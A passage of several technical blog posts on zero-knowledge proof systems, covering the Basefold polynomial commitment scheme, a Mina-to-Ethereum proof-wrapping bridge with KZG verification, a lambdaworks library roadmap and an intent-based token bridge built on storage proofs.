With the advent of efficient SNARKs based on multivariate polynomials, such as Spartan or HyperPlonk, there has been an increased interest in new commitment schemes suited for this kind of polynomials. Binius</a>, Zeromorph</a>, and Basefold</a> all propose new forms to commit to multilinear polynomials. Binius offers the advantage of having zero overhead to represent data types (whereas many proof systems use at least 32-bit field elements to represent single bits) and works over binary fields. The commitment adapts brakedown, which was designed to be field agnostic. Basefold generalizes FRI to codes other than Reed-Solomon, leading to a field-agnostic PCS.</p>
Customizable Constraint Systems (2023)</h3>
CCS</a> generalizes R1CS while capturing R1CS, Plonkish, and AIR arithmetization without overheads. Using CCS with Spartan IOP yields SuperSpartan, which supports high-degree constraints without having the prover to incur cryptographic costs that scale with the degree of the constraint. In particular, SuperSpartan yields a SNARK for AIR with a linear time prover.</p>
Conclusion</h2>
This post describes the advances of SNARKs since their introduction in the mid-1980s. Advances in computer science, mathematics, and hardware, together with the introduction of blockchain, have led to new and more efficient SNARKs, opening the door for many applications that could transform our society. Researchers and engineers have proposed improvements and adaptations to SNARKs according to their needs, focusing on proof size, memory use, transparent setup, post-quantum security, prover time, and verifier time. While there were originally two main lines (SNARKs vs STARKs), the boundary between both has begun to fade, trying to combine the advantages of the different proof systems. For example, combining different arithmetization schemes with new polynomial commitment schemes. We can expect that new proof systems will continue to rise, with increased performance, and it will be hard for some systems that require some time to adapt to keep up with these developments unless we can easily use these tools without having to change some core infrastructure.</p>


How does Basefold polynomial commitment scheme generalize FRI
Unknown — Fri, 09 Feb 2024 00:00:00 +0000
Introduction</h2>
lambdaworks</a> is a library designed to provide efficient proof systems. We want it to support state of the art provers and associated primitives so that people can use them to build new applications. Among those primitives we have polynomial commitment schemes (PCS). These are a powerful cryptographic tool that allows us to bind ourselves to a given polynomial by means of a small data structure (such as the root of a Merkle tree or a point over an elliptic curve) and prove its evaluations at some points. Polynomial commitment schemes consist of the following five algorithms:</p>
    * Setup: given a security parameter, $\lambda$, it generates the public parameters (pp) for the PCS.</span></span>
    * Commit: taking the pp and a polynomial, $p$, outputs a commitment to the polynomial $\mathrm{cm}(p)$.</span></span>
    * Open: given the pp, a polynomial $p$ and a commitment to $p$, $\mathrm{cm}(p)$, checks whether $\mathrm{cm}(p)$ is the commitment to $p$.</span></span>
    * Prove evaluation: given the pp, a polynomial $p$, a point $z$ and a claimed evaluation $v$, outputs a proof $\pi$ that the $p(z) = v$.</span></span>
    * Verify evaluation: given the pp, the commitment to $p$, the proof $\pi$, the point $z$ and the claimed value $v$, checks whether the evaluation proof is valid.</span></span></code></pre>
Polynomial commitment schemes are one of the basic building blocks of modern SNARKs. Some commitment schemes require a trusted setup (such as KZG</a>), while others are transparent (such as FRI, Brakedown and IPA). Different PCS offer trade-offs between evaluation proof sizes, evaluation times, security assumptions, and other algebraic properties (for example, being additively homomorphic).</p>
Basefold</a> generalizes the FRI commitment scheme</a> to other codes different from Reed-Solomon. These codes need to have certain properties, though. This post will discuss the basics of coding theory and explain how basefold works.</p>
Coding theory</h2>
Error-correcting codes are ways of representing data so that we can recover the information even if parts of it were corrupted. We do this by introducing redundancy, and the message can be recovered even if parts of the redundant data are corrupted. There is a trade-off between maximizing error correction and redundancy: codes with higher redundancy should be able to tolerate a higher number of errors.</p>
A code of block length $n$ over an alphabet $\Sigma$ is a subset of $\Sigma^n$. In our case, we will be interested in codes where the alphabet $\Sigma$ is some finite field $\mathbb{F}$ and $\vert \Sigma \vert = q$.</p>
The rate of a code of dimension $k$ and block size $n$ is given by $\rho = k / n$ and is a measure of the amount of redundancy introduced in the code.</p>
Given a code, the Hamming distance, $d$, between two code words is given by the number of positions they differ at. The relative distance is the ratio between the distance and the block length, $\delta = d / n$.</p>
A code over $\Sigma^n$ of dimension $k$ and distance $d$ is called an $(n , k , d )_{\Sigma}$ - code. A linear code is such that any linear combination of codewords results in a codeword (that is, if $c_0$ and $c_1$ are the encoding of $m_0$ and $m_1$, then $\alpha_0 c_0 + \alpha_1 c_1$ is also a codeword, specifically, the codeword associated with $\alpha_0 m_0 + \alpha_1 m_1$).</p>
For linear codes, the encoding function can be represented as a vector-matrix product using a generator matrix, $G$, that is

$\mathrm{Enc}(v) = v . G$</p>
For example, Reed-Solomon codes use a Vandermondian matrix with points $\alpha_0, \alpha_1, … , \alpha_{n - 1}$:

$$\begin{align}

V(\alpha_0 , \alpha_1 , … , \alpha_{n - 1}, k)_{i,j} = \alpha_j^i

\end{align}$$</p>
Reed-Solomon codes work by interpreting the message as the coefficients of a degree $k - 1$ polynomial. If the message is $(m_0 , m_1 , … , m_{k - 1})$, we can think of them as $m_0 + m_1 x + … + m_{k - 1} x^{ k - 1}$ and provide the evaluations over $n$ distinct points. Since the polynomial is at most of degree $k - 1$, it has at most $k - 1$ zeros, making two different codewords coincide at most in $k - 1$ places, so $d = n - k + 1$. Codes which satisfy $d = n - k + 1$ are called maximum distance separable codes.</p>
Basefold</h2>
Basefold</a> works with foldable linear codes. Remember that we can represent linear codes via the generator matrix, $G$. The generator matrix, $G_{k , n}$ of the foldable linear $(n, k, d )$ - code has the following block matrix structure:

$$G_{k,n} = \begin{bmatrix}

G_{k/2,n/2} & G_{k/2,n/2} \newline

G_{k/2,n/2} T_{k/2,n/2} & G_{k/2,n/2}T^\prime_{k/2,n/2}

\end{bmatrix}$$

where $G_{k/2,n/2}$ is the generator matrix of the foldable linear $[n/2, k/2, d^\prime ]_\Sigma$-code.</p>
For example, Reed-Solomon codes satisfy this property, when instantiated over a multiplicative subgroup of size $n = 2^m$ (we also assume that $\rho = 2^{- \beta}$). If we choose a generator $g$ of the subgroup and represent the points as $\{ 1, g, g^2 , … g^{m - 1} \}$, we have

$$G_{k,n} = \begin{bmatrix}

1 & 1 & 1 & 1 & \dots & 1 \newline

1 & g & g^2 & g^3 & \dots & g^{m - 1} \newline

1 & g^2 & g^4 & g^6 & \dots & g^{2(m - 1)} \newline

1 & g^3 & g^6 & g^9 & \dots & g^{3(m - 1)} \newline

\vdots & \vdots & \vdots & \vdots & \ddots & \vdots \newline

1 & g^{k - 1} & g^{2(k - 1)} & g^{3(k - 1)} & \dots & g^{(k - 1) (m - 1)}

\end{bmatrix}$$</p>
Let’s reorder the matrices rows by placing first all the even-numbered rows, in increasing order, followed by all the odd-numbered rows. We get,

$$G_{k,n} = \begin{bmatrix}

1 & 1 & 1 & 1 & \dots & 1 \newline

1 & g^2 & g^4 & g^6 & \dots & g^{2(m - 1)} \newline

1 & g^4 & g^8 & g^{12} & \dots & g^{4(m - 1)} \newline

\vdots & \vdots & \vdots & \vdots & \ddots & \vdots \newline

1 & g & g^2 & g^3 & \dots & g^{m - 1} \newline

1 & g^3 & g^6 & g^9 & \dots & g^{3(m - 1)} \newline

1 & g^5 & g^{10} & g^{15} & \dots & g^{15(m - 1)} \newline

\vdots & \vdots & \vdots & \vdots & \ddots & \vdots \newline

1 & g^{k - 1} & g^{2(k - 1)} & g^{3(k - 1)} & \dots & g^{(k - 1) (m - 1)}

\end{bmatrix}$$</p>
We can see that the lower block (the odd rows) looks a bit similar to the upper block, except that most columns are shifted by a similar amount. For example, column one there is a factor $g$ missing, column two, a factor $g^2$, column three, $g^3$ and so on. We have therefore broken the matrix into upper and lower parts. We need to break each part into right and left parts.</p>
If $g$ is a generator of a group of order $m$, then $\omega = g^2$ is a generator of a subgroup of order $m/2$. As soon as we have something like $\omega^{m/2}$ we wrap back to $1$. This breaks the upper half into two identical matrices, which correspond to $G_{k/2, n/2}$. In the lower half, the diagonal matrices are:

$T_{ii} = g^i$

$T^\prime_{ii} = g^{m/2} g^i$

But $g^{m/2} = - 1$, so $T = - T^\prime$.</p>
We see that linear foldable codes generalize this property we had in Reed-Solomon codes. There are, however, no restrictions on the generator matrices, other than fulfilling the foldable linear code definition. This lets us choose the diagonal matrices $T, T^\prime$ more freely and be able to use non FFT-friendly fields (this makes basefold PCS field-agnostic). In basefold, they set the matrices $T = - T^\prime$, and their elements are sampled at random from the multiplicative group of the base field. We can construct the generator matrices inductively, by choosing $G_0$ and $T_0 , T_0^\prime$ and get $G_1$, which, together with $T_1 , T_1^\prime$ leads to $G_2$, etc. To encode a message $v$, we just have to do $v.G_d$. We can also encode $v$ in a recursive fashion,</p>
    1. If $d = 0$, $\mathrm{enc}_0 ( v ) = v.G_0$</span></span>
    2. Otherwise, split $v = (w_0 , w_1)$ in the first and second halves. Let $c_0 = \mathrm{enc}( w_0 )$, $c_1 = \mathrm{enc}( w_1 )$, $t = \mathrm{diagonal}(T)$ and compute $\mathrm{enc}(v) = (m_0 + m_1 \times t , m_0 - m_1 \times t)$, where $\times$ is the componentwise (Hadamard) product.</span></span></code></pre>
The evaluation of a multilinear polynomial $p$ at $z$ can be turned into an evaluation check of $p$ at a random point via the sumcheck protocol</a>. FRI works in a similar way: the last value sent in FRI corresponds to the encoding of a random evaluation of the polynomial of the first round. Therefore, a PCS can be constructed by using a Merkle tree commitment to the encoding of some polynomial $p$. During evaluation, prover and verifier run in parallel the proximity test and the sumcheck protocol using the same set of challenges. The verifier can check that the evaluation of the polynomial corresponds to the last message of the prover in the proximity test.</p>
Basefold’s proximity test works in the same way as FRI. We have a commit phase where the prover commits to lists of codewords/evaluations and a query phase, where the verifier checks the consistency between the codewords. During the commitment phase,</p>
    1. The prover starts with $\pi_d$, the encoding of some polynomial.</span></span>
    2. For i = $d - 1$ to $0$  </span></span></code></pre>
a. Samples $\alpha_i$ from the verifier.

b. For every $j$ in $n_i$ the prover computes the line $l_j (x)$ passing through $(T_i [j,j] , \pi_{i+1} [j])$ and $(-T_i [j,j] , \pi_{i+1} [j + n_i ])$ and sets $\pi_i [j] = l(\alpha_j )$

c. The prover commits to $\pi_i$.</p>
This commit phase is, in fact, identical to FRI. We start with the evaluations of the composition polynomial, $f$ (which is the Reed-Solomon encoding of the polynomial) and to which we committed previously. We sample the folding challenge $\alpha_i$ and then obtain the following function, $l(x) = (f(x_0 ) + f( - x_0 ))/2 + x (f( x_0 ) - f( - x_0))/2x_0$. We can see that $l(x_0 ) = f( x_0 )$ and $l( - x_0) = f (- x_0 )$, which is essentially the line passing through those two points.</p>
During the query phase,</p>
    1. The verifier samples an index $i$ in $[0, n_d - 1]$.</span></span>
    2. For $j = d - 1$ to $0$,  </span></span></code></pre>
a. Queries $\pi_{j + 1} [i]$ and $\pi_{j + 1} [i + n_i / 2]$

b. Computes the line $l_i(x)$ passing through those two points.

c. Checks that $\pi_j [i] = l(\alpha_j )$

d. If $j > 0$ and $i > n_{i - 1}$, set $i = i - n_{i - 1}$.
3. Finally, check whether $\pi_0$ is a valid codeword using the generator matrix $G_0$.</p>
To reduce the soundness error, the verifier can query more indexes, as we did in FRI. We are only lacking the evaluation protocols (prove and verify). To construct it, we need to use the sumcheck protocol, together with the proximity test.</p>
At the start of the protocol, the verifier has access to $\pi_d$, the encoding of the polynomial, the evaluation point, $z$ and the claimed evaluation, $v$. The protocol proceeds as follows:</p>
    1. The prover sends the univariate polynomial $h_d (x) = \sum_b f(b,x) eq_z (b,x)$ to the verifier.</span></span>
    2. For $i = d - 1$ to $0$,  </span></span></code></pre>
a. The prover runs the commit phase steps 2.a, 2.b, 2.c.

b. If $i > 0$, the prover sends $h_i = \sum_b f(b,x, r_i , … , r_{d - 1} ) eq_z (b,x, r_i , … , r_{d - 1} )$.
3. The verifier:

a. Checks query phase of the proximity test.

b. Performs all the checks in the sumcheck protocol

c. Verifies that $\mathrm{enc_0} (h_1 ( r_0 ) / eq_z (r_0 , … r_{d - 1} )) = \pi_0$</p>
We see that the evaluation protocol basically consists of the sumcheck and proximity tests run concurrently.</p>
Conclusion</h2>
This post discussed a new commitment scheme, basefold, which generalizes FRI. The main advantanges over FRI are that the new commitment works better with multilinear polynomials and is field agnostic. The construction can be instantiated with any foldable linear code. These are codes whose generator matrix has a given block structure. We will be adding this new commitment scheme to lambdaworks in the coming future and compare its performance with other constructions.</p>


Mina to Ethereum ZK bridge
Unknown — Mon, 05 Feb 2024 00:00:00 +0000
Introduction</h2>
During the last few months, we have been developing a bridge between Mina and Ethereum</a>. Mina</a> is a layer-1 blockchain that uses zero-knowledge proofs (zk-SNARKs) to maintain its size at 22 kB</a>. The bridge serves two purposes:</p>
    1. Allowing cross-chain transactions seamlessly.</span></span>
    2. Allowing applications to leverage Mina's zero-knowledge capabilities and expand their functionalities across multiple chains.</span></span></code></pre>
Due to $2$, users can simply prove things off-chain and verify them on-chain in Ethereum.</p>
At its core, Mina uses a proof system called Kimchi</a>, which is a variant of Plonk with many optimizations and uses an inner product argument (IPA) polynomial commitment scheme. Its key optimizations are custom gates for foreign field addition and multiplication, Keccak, Poseidon, and lookup arguments. Above that, we have Pickles, which is Mina’s inductive SNARK composition, enabling a flexible way to have incrementally verifiable computation</a>. This construction allows us to generate a proof that attests to the validity of the transition from state $S_n$ to state $S_{n + 1}$ while checking a proof that the previous step was correct. While this helps Mina achieve its succinctness, verifying these proofs in Ethereum is very expensive.</p>
Currently, pairing-based SNARKs (such as those using KZG) have cheaper verification costs in Ethereum, which makes this option attractive. To “wrap” Mina state proofs, we can generate a SNARK to verify a Mina proof obtained with IPA, using a variant of Kimchi with the KZG commitment scheme. To do so, we must first express all the verification logic of the Kimchi-IPA proof as a circuit, then use this circuit, the proof, and other public input and generate a proof using Kimchi-KZG. This is more easily said than done. First, we must express all the verification operations as an arithmetic circuit. The good thing is that we can express even complex operations such as MSM using elliptic curve gates and lookup arguments. The bad thing is that the equations are expressed over Ethereum’s BN-254 scalar field, which differs from the Pasta fields. This means we will have to do many foreign field operations, making the SNARK quite expensive.</p>
This post will provide an overview of the bridge, Kimchi, and the KZG verifier. For an introduction to some of the topics, see Plonk</a>, IPA</a>, and lookups</a>.</p>
The Bridge</h2>
The bridge has the following components:</p>
    1. A backend service periodically wraps and posts Mina's state proofs to an EVM chain.</span></span>
    2. A "wrapping" module for Mina's proofs to make them easy to verify on the EVM.</span></span>
    3. The solidity logic for verifying the wrapped Mina state proofs in the EVM.</span></span>
    4. Browser utility for smart contracts.</span></span>
    5. A solidity contract utility that smart contract developers or users can execute on an EVM chain to feed in a Mina state lookup proof that will check the state lookup against the latest posted Mina state proof to verify that this Mina state is valid.</span></span></code></pre>
The flow is shown in the following picture. For more details related to the architecture, see the bridge’s readme</a>.

</p>
SNARKs</h2>
As mentioned, Mina’s proof system is Kimchi, a modified version of Plonk, using IPA and working over a pair of elliptic curves, Pallas and Vesta (shortened to Pasta curves). IPA and Pasta curves enable easy recursion but at the expense of longer proofs than KZG-based SNARKs. Verifying and storing these proofs in Ethereum is expensive, so we need to obtain a new type of proof that can be checked less expensively in Ethereum. Let’s dive into Kimchi, Pickes, and KZG commitments.</p>
Kimchi</a></h2>
This is a modified version of Plonk</a>. There are three types of arguments:</p>
    * Custom gates.</span></span>
    * Permutation.</span></span>
    * Lookups.</span></span></code></pre>
These arguments are translated into several polynomials, which must evaluate to zero over some set. Luckily, we can check that all the polynomials evaluate to zero over the set by doing a random linear combination. Say, for example, that $p_1 , p_2 … p_n$ all evaluate to zero over the set $S = { 1, 2, … , m}$. We can have the verifier sample $\alpha$ and obtain

$p (x) = \alpha p_1 (x) + \alpha^2 p_2 (x) + \dots + \alpha^n p_n (x)$

which should also evaluate to zero. To see that the polynomial has that property, we can show that $p(x)$ is divisible by the polynomial vanishing on S, $Z_S (x)$. Another way to state this is that there is some polynomial $q(x)$ such that $p(x) = Z_S (x) q(x)$. Moreover, if we decide to perform this check at just one random point $\zeta$ from a very large set, then, with high probability, we have that the previous equality holds for all the set.</p>
The ingredients are the circuit specification (the gates and the connections/wirings) and the execution trace. The execution trace in Kimchi has input/output registers (7) plus advice registers (8). The circuit is known beforehand and represents a given program/computation. The execution trace depends on the particular execution of the program (for example, we can run the same program with different inputs).</p>
The following tables describe the circuit:</p>
    * Gates: Generic, Poseidon, Elliptic Curve Addition, Endo Scalar, Endo Scalar Multiplication, Scalar Multiplication, Range Check, Foreign Field Addition, Foreign Field Multiplication, Rotation, and XOR.</span></span>
    * Coefficients. These are only used in Poseidon and generic gates.</span></span>
    * Wirings (also Permutations or Sigmas)</span></span>
    * Lookup tables</span></span>
    * Lookup selectors</span></span>
</span>
pub struct CircuitGate<F: PrimeField> {</span></span>
    /// type of the gate</span></span>
    pub typ: GateType,</span></span>
</span>
    /// gate wiring (for each cell, what cell it is wired to)</span></span>
    pub wires: GateWires,</span></span>
</span>
    /// public selector polynomials that can used as handy coefficients in gates</span></span>
    #[serde_as(as = "Vec<o1_utils::serialization::SerdeAs>")]</span></span>
    pub coeffs: Vec<F>,</span></span>
}</span></span></code></pre>
Kimchi contains three main algorithms:</p>
    1. Setup: takes the circuit and produces the prover and verifier indexes.</span></span>
    2. Proof creation: takes the circuit and the prover index and outputs a proof.</span></span>
    3. Proof verification: takes the proof and the verifier index and checks the proof.</span></span></code></pre>
The steps performed by the prover to obtain the proof are listed here</a>. The verification follows the steps shown here</a>.</p>
Pickles</h2>
Pickles uses the Pasta curves to deliver incrementally verifiable computation efficiently. The Pasta curves are also known as:</p>
    * Tick/Step (Vesta), handling blocks and transactions' proofs.</span></span>
    * Tock/Wrap (Pallas), handling signatures and performing recursive verifications.</span></span></code></pre>
Tock is used to prove the verification of a Tick proof and outputs a Tick proof. Tick is used to prove the verification of a Tock proof and outputs a Tock proof.</p>
    * $\mathrm{Prove_{tock} ( Verify(Tick) ) = Tick_{proof}}$</span></span>
    * $\mathrm{Prove_{tick} (Verify(Tock) ) = Tock_{proof}}$</span></span></code></pre>
Both Tick and Tock can verify at most two proofs of the opposite kind. Pickles contains two components: fast (1 - 30 ms) and slow (100 ms - 1 s) verifiers. Given a proof $\pi_1$, we first execute the fast verifier, and the update algorithm takes the previous proof state, $S_0$, and $\pi_1$ and generates the next proof state, $S_1$. If we have an incoming $\pi_2$, we do not execute the slow verifier, beginning a new cumulative phase. We run the fast verifier on $\pi_2$ and update the proof state from $S_1$ to $S_2$. If there are no more incoming proofs, we use the slow verifier to check the last state proof $S_n$.</p>
KZG verifier solidity</h2>
The code for the verifier in solidity is here</a>. The verifier can be divided into two large parts:</p>
    * Partial verification.</span></span>
    * Final verification.</span></span></code></pre>
The first handles checks such as the correct length of evaluations and commitments regenerates the random challenges using Fiat-Shamir and uses the claimed evaluations to see whether the gate and permutation constraints are valid. The second part checks the commitments by calling the pairing check function. In a naïve KZG verification, we must compute one pairing for every evaluation we want to check. However, we can randomly combine the commitments and evaluations to perform just one pairing check.</p>
The working principle behind the verification of the KZG evaluation proof is the following: we have a commitment to a polynomial, $p(x)$, an evaluation point, $\zeta$, a claimed evaluation, $v = p(\zeta)$, and the evaluation proof, $\pi = \mathrm{cm}(q)$, which is the commitment to a quotient polynomial, $q(x)$. If the evaluation is correct, then $p(x) - v$ should be divisible by $x - \zeta$, that is

$p(x) - v = (x - z) q(x)$

We cannot do this check directly since we have access only to the commitments and not the whole polynomials. We have $\mathrm{cm}(p) = p(s) g_1$ and $\mathrm{cm}(q) = q(s) g_1$, which are points on an elliptic curve. We could attempt to check everything at just one point, $s$, and, if the two sides match, then with overwhelming probability, the polynomial was evaluated correctly. The pairing is a function $e(x,y)$ with two properties:</p>
    1. Bilinear: $e(x_1+x_2,y_1+y_2) = e(x_1 , y_1 )e(x_2 , y_2 )e(x_1 , y_2 )e(x_2 ,y_1 )$</span></span>
    2. Non-degenerate: if $e(x,y) = 1$, then $x$ or $y$ are the point at infinity (neutral element for elliptic curve addition).</span></span></code></pre>
It follows from the bilinearity property that

$e( p(s) g_1 - v g_1 , g_2 ) = e(g_1 , g_2 )^{p(s) - v}$

Similarly,

$e( q(s) g_1 , s g_2 - \zeta g_2 ) = e(g_1 , g_2 )^{q(s)(s - \zeta)}$

Since neither $g_1$ nor $g_2$ are the point at infinity (because they are generators of the whole group), $e (g_1 , g_2) \neq 1$, and therefore, if both pairings are equal, then it follows that

$p(s) - v = q(s) (s - \zeta)$

The EVM has a function, pairing check, which computes the product of both pairings and verifies that it is equal to one. Because of this condition, we rewrite the second pairing, negating the commitment to the quotient,

$e( - q(s) g_1 , s g_2 - \zeta g_2 ) = e(g_1 , g_2 )^{ - q(s)(s - \zeta)}$</p>
Batching evaluation at point $\zeta$ for several polynomials</h3>
If we have several polynomials $p_1, p_2, … p_n$ and we want to check the evaluation at the same point $\zeta$, we just need to perform a random linear combination for each of these elements:</p>
    * Commitments to $p_k$: $\mathrm{cm}(p) = \sum \alpha^k \mathrm{cm}(p_k )$</span></span>
    * Commitments to quotients $q_k$: $\mathrm{cm}(q) = \sum \alpha^k \mathrm{cm}(q_k )$</span></span>
    * Evaluations: $v = \sum \alpha^k v_k$</span></span></code></pre>Batching evaluations at several points $\zeta_k$ for one polynomial</h3>
If we need to check that a polynomial evaluates at $\zeta_1$ to $v_1$, at $\zeta_2$ to $v_2$, … and at $\zeta_n$ to $v_n$, we can fuse all these checks into a single one. The steps are as follows:</p>
    * Compute the polynomial of degree $n - 1$, $I(x)$, that interpolates the points $(\zeta_k , v_k )$. This means that $I( \zeta_k ) = v_k$ for $k = 1, 2, ... n$. If we have two points only, $I(x) = (v_2 - v_1 ) (\zeta_2 - \zeta_1 )^{- 1} (x - \zeta_1 ) + v_1$, which is the line passing through those two points.</span></span>
    * The polynomial $p(x) - I(x)$ evaluates to $0$ at $\zeta_k$, which means that $p(x) - I(x)$ is divisible by the polynomial $D(x) = \prod (x - \zeta_k )$(in our two-dimensional case, this is $(x - \zeta_1 )(x - \zeta_2 )$). Compute the quotient $q(x)$ of $p(x) - I(x)$ by $D(x)$ and commit to it.</span></span></code></pre>
We can combine this idea with batch verification for several polynomials and just pay for one pairing check!</p>
Conclusions</h2>
This post presented the bridge between the succinct blockchain Mina and Ethereum, allowing seamless cross-chain transactions and dApps to leverage Mina’s zk capabilities. One of the main challenges is related to the verification of Mina’s proofs in Ethereum since they rely on IPA, which is more expensive than those based on KZG. To deal with this, we have to create a wrapper (a program that proves the verification of Mina proofs) to obtain new proofs that can be verified in Ethereum more cost-effectively. We covered the basics of Kimchi (Mina’s proof system) and Pickles (which allows Mina to deliver incrementally verifiable computation, the key component for succinctness) and how KZG commitments work. We also discussed some of the challenges related to foreign field operations. In upcoming posts, we will discuss some of the bridge’s components and the project’s milestones and advances in more depth.</p>


Happy birthday, lambdaworks!
Unknown — Tue, 30 Jan 2024 00:00:00 +0000
Introduction</h2>
It’s been almost a year since we started building lambdaworks</a>! lambdaworks is our library that implements efficient cryptographic primitives to build proof systems. Along with it, many backends for proof systems are shipped, and compatibility with different frontends is supported. We wanted to give an overview of what we have done over the last year and the roadmap for the future. Why did we choose to embark on this journey? We are truly bullish on zero-knowledge/validity proofs and their potential to solve many problems and create new applications, as we stated in our previous post</a> and crypto doctrine</a>. We decided to work in this challenging environment, where math, distributed systems, and cryptography meet. The first challenge we faced was the lack of performant and developer-friendly libraries, though there are some exceptions. Some have nice APIs and are easy to use but not written in Rust; others are written in Rust but have poor programming practices. So, we decided with a team of engineers and mathematicians to build a new library, written in Rust, focusing on performance and developer-friendliness. We also wanted to make all this knowledge available to other developers and help onboard new people to this space by writing clear documentation and explaining how each of the parts and proof systems work. Open source and decentralization are necessary practical conditions to build crypto, and we cannot think of decentralization as the knowledge and tools to build things are centralized in a few players. Let’s jump into our plans for the future and some numbers.</p>
Some numbers:</h2>
Here we give some figures to understand all the work we have been doing in the library and the contributions from the community:</p>
    * 464 PRs merged.</span></span>
    * 60 contributors.</span></span>
    * 8 releases.</span></span>
    * 49k lines of code in Rust</span></span>
    * Several posts on finite fields, cryptography, and proof systems.</span></span>
    * Use of lambdaworks in 2 CTF events and Lambda ZK Week.</span></span>
    * 800+ members in lambdaworks channel.</span></span>
    * One cryptography bootcamp with 21 interns from 12 countries</span></span></code></pre>Objectives:</h2>
    * Reference library for cryptography and proof systems.</span></span>
    * Written in Rust.</span></span>
    * To be used in production, not just for academic research. However, we also want to enable researchers to write their papers in our library easily.</span></span>
    * Support for GPU acceleration (Metal, CUDA).</span></span>
    * Simple to use, developer-focused.</span></span>
    * Clear documentation, plenty of examples.</span></span></code></pre>What do we still have to work on</h2>
We have added several tools and proof systems to the library, but we still have a long way to go:</p>
    * Integration into other provers, VMs, and cryptography projects.</span></span>
    * Documentation. We still need to improve the project documentation, add more examples, and enhance user experience.</span></span>
    * Create a grant and bounty program</span></span>
    * Support the use of Icicle.</span></span>
    * Towers of binary fields.</span></span>
    * New polynomial commitment schemes: basefold, brakedown, inner product argument (IPA), Binius.</span></span>
    * New layouts for Cairo STARK Platinum.</span></span>
    * Lookup arguments (for example, Plookup, and Lasso)</span></span>
    * New proof systems: Hyperplonk, Spartan, Marlin, GKR.</span></span>
    * Folding schemes.</span></span>
    * Supporting new elliptic curves.</span></span>
    * New hash functions.</span></span>
    * Improve performance of FFT, elliptic curves, polynomials, and general finite field arithmetic.</span></span>
    * Add new coordinate systems for elliptic curves.</span></span>
    * Second edition of the cryptography bootcamp.</span></span></code></pre>What we accomplished?</h2>
Over the year, we have implemented different core math, crypto building blocks, and proof systems. We have received contributions from the community, not only in the form of PRs but also as issues and bug reports.</p>
Main crates:</h3>
The main crates we have implemented are:</p>
    * Finite Fields: all the mathematical building blocks for cryptography and proof systems. This is used by the Cairo VM in production in Starknet.</span></span>
    * Crypto: hash functions, Merkle trees, polynomial commitment schemes.</span></span>
    * Provers (& verifiers): STARK Platinum, Groth 16, Plonk. Adapters for Cairo, Winterfell, Miden (STARKs), Circom, and Arkworks (Groth 16).</span></span></code></pre>Fields:</h3>
    * Optimized Montgomery backend.</span></span>
    * Specialized backends for Mersenne-31 and Mini-Goldilocks ($2^{64} - 2^{32} +1$).</span></span>
    * Field extensions.</span></span>
    * Radix-2 and radix-4 fast Fourier Transform.</span></span>
    * Elliptic curves.</span></span>
    * Multiscalar multiplication.</span></span>
    * Pairings.</span></span>
    * Univariate polynomials.</span></span>
    * Multivariate polynomials.</span></span></code></pre>Crypto:</h3>
    * Fiat Shamir transformation.</span></span>
    * Hash functions: Poseidon, Pedersen</span></span>
    * Merkle trees</span></span>
    * KZG commitment scheme</span></span></code></pre>Provers:</h3>
    * General STARK prover</span></span>
    * Groth 16</span></span>
    * Plonk with KZG commitment</span></span>
    * Adapters</span></span></code></pre>


A fast trust minimized intent based bridge solution for Ethereum and L2s powered by multi-proof storage proofs
Unknown — Sun, 28 Jan 2024 00:00:00 +0000
Authors:</strong>Roberto Catalan</a> and Federico Carrone</a></p>
Bridges are generally insecure and economically inefficient. They exhibit an asymmetry between users and bridge operators, where users can easily lose funds. We propose a bridge design that is simple, modular, and utilizes multi-storage proofs and the native messaging system between Ethereum and Layer 2 networks (L2s) as a fallback mechanism.</em></p>
Bridging is a trust issue</h2>
How can we offer a system where the users don’t have to trust a facilitator to exchange their assets from an L2 to Ethereum?</p>
We propose a simple protocol that follows these steps:</p>
    1. The user specifies a destination address on Ethereum and locks the tokens X to be bridged into an L2 escrow smart contract.</span></span>
    2. A market maker monitors a change of state in the escrow smart contract.</span></span>
    3. a. The market maker calls the transfer function of the PaymentRegistry Contract in Ethereum.  </span></span></code></pre>
b. The transfer function of the PaymentRegistry contract in Ethereum pays the tokens X to the User.
4. A storage proof is generated, containing evidence of a transfer from the market maker’s Ethereum account to the user-specified address in Ethereum.
5. Ethereum PaymentRegistry storage information is used as part of a storage proof.
6. L2 Escrow contract verifies the storage proof of the PaymentRegistry contract in Ethereum and pays the MM with the initial tokens locked by the user.
</p>
The same design can be expanded to be used to bridge tokens from an L2 to another L2. The same design can include multi-proof storage proofs instead of using only one. We also have implemented a fallback mechanism using the native message mechanism between Ethereum and L2s in case the storage proof providers are offline.</p>
Fallback mechanism</strong>

If the storage proof providers are not available, the market maker can prove to the Escrow contract that they fulfilled the user’s intent through the rollup’s native messaging system. Using this messaging system has the same trust assumptions as the L2s used in the transfer.</p>
Risks</h2>
For the user, the risks include the existence of a bug in the code of the smart contract, the existence of a bug in the circuits of the ZK/validity proof verification and the fact that the storage proof provider can go offline. The first risk is mitigated by having a very simple smart contract. The second risk is mitigated by using multi-proof storage proofs and multiple ZK/validity proof implementations or TEEs. If the storage proof provider goes offline the fallback mechanism can be used.</p>
The risks for market makers are the same as for users, plus the risk of reorganization of the chain and the fact that the market maker receives the same tokens on the L2s rather than on Ethereum.</p>
Since the capital is locked for a short period (until the proof is generated or the message arrives), the risks are minimized and the attack surface is smaller for the market maker.</p>
Questions</h2>
What are our disadvantages?</strong>

The biggest disadvantage of this solution is that users can only bridge tokens that are present in both the origin and destination chains.

Another disadvantage is that the risks don’t disappear; they are simply transferred to the market maker.</p>
How can users cancel their order?</strong>

Initially, we are not going to offer the ability to cancel orders. The main reason is to avoid any timing attacks. For instance, a user could create an order and cancel it right after the market maker has paid them on the destination chain, thereby stealing funds from the market maker.</p>
Is there any real-world implementation of this bridge?</strong>

Yes. We have already implemented this between Starknet and Ethereum. We plan to integrate zkSync, Arbitrum, Optimism, Scroll, Base, and Linea next.

All integrations require the same codebase with a few modifications, except for Starknet, which is not EVM compatible.</p>
How fast is it?</strong>

From the user’s perspective, the bridging is completed in less than 30 seconds, as quickly as the time it takes the market maker to observe the user’s deposit and execute a transfer.

From the market maker’s perspective, they will be able to withdraw the money after paying the user and generating the storage proof. This normally takes between 5 and 15 minutes. It’s important to also consider that the market maker will need to rebalance their liquidity using the native bridge and wait for the finality of the native bridge to rebalance their portfolio.</p>
How cheap is it?</strong>

The cost of this bridge is similar to an ERC20 transfer plus the cost of proving the state of the L1 and L2. This second cost tends towards zero since it’s amortized by multiple calls that use the same proof, and the proving cost is minimal compared to on-chain transfers.</p>
What is new in this design? Didn’t storage proofs solve this problem already?</strong>

Storage proofs alone don’t fundamentally change the design of a traditional bridge. They merely enable a safer coordination mechanism.

